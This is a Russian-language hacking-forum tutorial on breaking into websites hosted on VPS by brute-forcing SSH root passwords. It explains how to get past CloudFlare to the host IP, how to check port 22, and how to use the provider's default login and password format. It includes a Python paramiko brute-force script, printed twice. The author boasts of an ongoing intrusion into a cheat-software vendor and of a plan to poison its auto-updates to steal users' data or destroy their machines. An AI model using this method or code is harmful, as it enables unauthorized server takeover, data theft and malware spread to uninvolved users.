****форс сайтов на VPS

Здарова братишка, всегда наверное мечтал побыть немного в роли маминого хацкера, особенно хакнуть сайт какого-нибудь сервера в майнкрафте, и рубить лавэ.

Что нам нужно для начала?
1. Сайт-жертва.
2. Софт для проверки открытых портов или сайт, в моем случае это был софт, но мы же сука ленивые и хотим быстрее, поэтому покажу на примере сайта.
3. Python.
4. Немного времени.

Сайт и его IP на котором я буду демонстрировать пример будут замазаны, т.к. мои злые деяния еще не окончены.

Пробиваем домен сайта

Тут нам поможет данный ресурс, вводим домен и жмем GO.

Ебать, мы видим что у них используется CloudFlare тут нам уже необходимо читать колонку "IP Address Owner", ищем что-то говорящее о хостинге, к моему счастью ниже всего дерьма с защитой от DDoS идет сразу же "TIMEWEB Co Ltd.", пробиваем в интернете эти данные и видим, что TimeWeb - хостинг-провайдер, заебись то что надо, берем их IP(если что он будет слева как на скрине выше, просто я обрезал ибо закрашивать в пизду такое, с этим мы решили все хорошо.

Пробиваем IP на 22 порт

Тут уже нам поможет данный портал, тот IP, что мы узнали отсеяв от CloudFlare защиты вводим в окно IP, и в порт вводим "22", жмем проверить порт, при успешном поиске Вам повезло, при неудаче сайт либо не стоит на VPS либо ты накосячил в поиске хоста.

Python: ****форс пароля

Первое что необходимо узнать это логин SSH сервера жертвы, я погуглил про TimeWeb и узнал что по дефолту они ставят логин "root", в принципе практически везде стоит логин "root", нам остается верить что владелец еблан и не сменил его, далее я прошел начальную регистрацию VPS на TimeWeb и узнал, что пароль они генерируют из 12 символов, и маленьких и больших английских букв и пары цифр, регистрацию я проходил 8 раз на разные почты, поэтому тут я не мог допустить ошибку, далее нам нужен софт для ****форса, я решил доверится себе, и накидал на костылях программу для ****форса пароля SSH-пароля, он будет ниже, в целом на костылях потому, что делал от пизды, не на заказ а просто для самообразования, главное, что он функционирует, Proxy я не встраивал, потому что проверил, что их VPS не блочит мой IP при частом коннекте, так же использовал задержку в 15 секунд, чтобы либа не ебала мои мозги, конечно можно сделать пизже, использую Proxy +потоки, скорость повысится, но я никуда не тороплюсь, код работает на моей VPS специально купленной для такой хуйни, в интернете полно софта для ****форса, но я не хотел подбирать себе по духу, поэтому написал то, что нужно было мне.

import random
import paramiko
import time

chars = 'abcdefghijklnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
success_passwd = 0

ip_addr = str(input('IP-Adress SSH:'+ "\n"))
ssh_login = str(input('Login SSH:'+ "\n"))
length = int(input('Длина пароля:'+ "\n"))

while success_passwd == 0:
time.sleep(15)
password = ''
try:
for i in range(length):
password += random.choice(chars)

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip_addr, username=ssh_login, password=password)

print(f"IP: {ip_addr} | Login: {ssh_login} | Password: {password}.")
success_passwd = 1
except:
print(f"Пароль: {password} не подошел.")

Код

import random

import paramiko

import time



chars = 'abcdefghijklnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'

success_passwd = 0



ip_addr = str(input('IP-Adress SSH:'+ "\n"))

ssh_login = str(input('Login SSH:'+ "\n"))

length = int(input('Длина пароля:'+ "\n"))



while success_passwd == 0:

    time.sleep(15)

    password = ''

    try:

        for i in range(length):

            password += random.choice(chars)



        ssh = paramiko.SSHClient()

        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        ssh.connect(ip_addr, username=ssh_login, password=password)



        print(f"IP: {ip_addr} | Login: {ssh_login} | Password: {password}.")

        success_passwd = 1

    except:

        print(f"Пароль: {password} не подошел.")

Используем полученные данные

Если твой ****форс прошел успешно, то качай софтину Putty и подключайся по SSH по спизженным данным:

Если шо в этом примере IP не их тачки, так что не пиздите что деанон
Жмем "Open" и вводим логин и пароль от тачки:

Дальше все зависит только от твоей фантазии.

К слову обо всем этом, данную глупую уязвимость я обнаружил у очень популярного представителя читов, не скажу для какой игры, но скажу одно, все их данные хранятся на этой тачке, плюс их софт имеет режим autoupgrade, что дает мне возможность подменить файл который им загрузится с новым обновлением и массово спиздить все данные с их ПК или просто убить их пекарню, не говоря уже про слив их данных, которые хранится в БД.

Данный способ лайтовый, и я писал его полностью с 0, при публикации на других бордах указывать автора.